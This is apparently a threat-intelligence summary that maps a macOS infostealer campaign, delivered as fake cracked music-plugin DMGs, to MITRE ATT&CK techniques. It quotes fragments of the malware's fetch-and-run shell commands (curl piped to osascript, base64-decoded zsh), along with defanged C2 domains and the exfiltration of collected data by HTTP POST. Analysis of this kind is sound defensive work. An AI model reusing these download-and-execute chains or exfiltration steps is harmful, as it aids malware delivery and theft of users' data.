macOS Malware Analysis: Music Plugin DMG Loader

MITRE Techniques

• [T1204.002 ] User Execution: Malicious File – Social engineering lures convince users to run unsigned DMGs disguised as cracked plugins (‘social engineering to deceive users into installing malicious DMG files disguised as cracked music plugins’).
• [T1036 ] Masquerading – Malicious artifacts present as legitimate software and in-app resources (e.g., ‘disguised as cracked music plugins’ and a Mach-O named “Meta Installer”).
• [T1105 ] Ingress Tool Transfer – Stages download additional payloads from remote servers using curl and direct HTTP requests (‘the script downloads the payload to the /tmp directory’ and ‘curl -L $ORIGIN_LINK –output ${downloadPath}’).
• [T1059.004 ] Command and Scripting Interpreter: Unix Shell – Attackers use Bash and zsh scripts to construct requests, change permissions, decode payloads, and execute stages (‘#!/bin/bash…curl -L $ORIGIN_LINK –output ${downloadPath}initchmod 755 ${downloadPath}initbash ${downloadPath}init’).
• [T1059.006 ] Command and Scripting Interpreter: AppleScript/osAScript – Final payload execution and additional actions performed via osascript to run AppleScript commands (‘… | osascript’ and ‘curl … | osascript’).
• [T1027 ] Obfuscated Files or Information – Use of base64 encoding and obfuscated shell/zsh scripts to hide payloads and commands (‘The script decodes content via base64 -D’ and ‘base64 -D | zsh’).
• [T1071.001 ] Application Layer Protocol: Web Protocols – C2 and payload retrieval performed over HTTP(S) to domains such as mac[.]fleebottom-33[.]xyz and ballfrank[.]today (‘http://mac[.]fleebottom-33.xyz/launch_mac.php…’).
• [T1041 ] Exfiltration Over C2 Channel – Infostealer attempts to upload collected data (/tmp/osalogging.zip) to attacker-controlled servers via HTTP POST requests (‘attempting to upload it to the attacker’s server as a single POST request or in managed chunks’).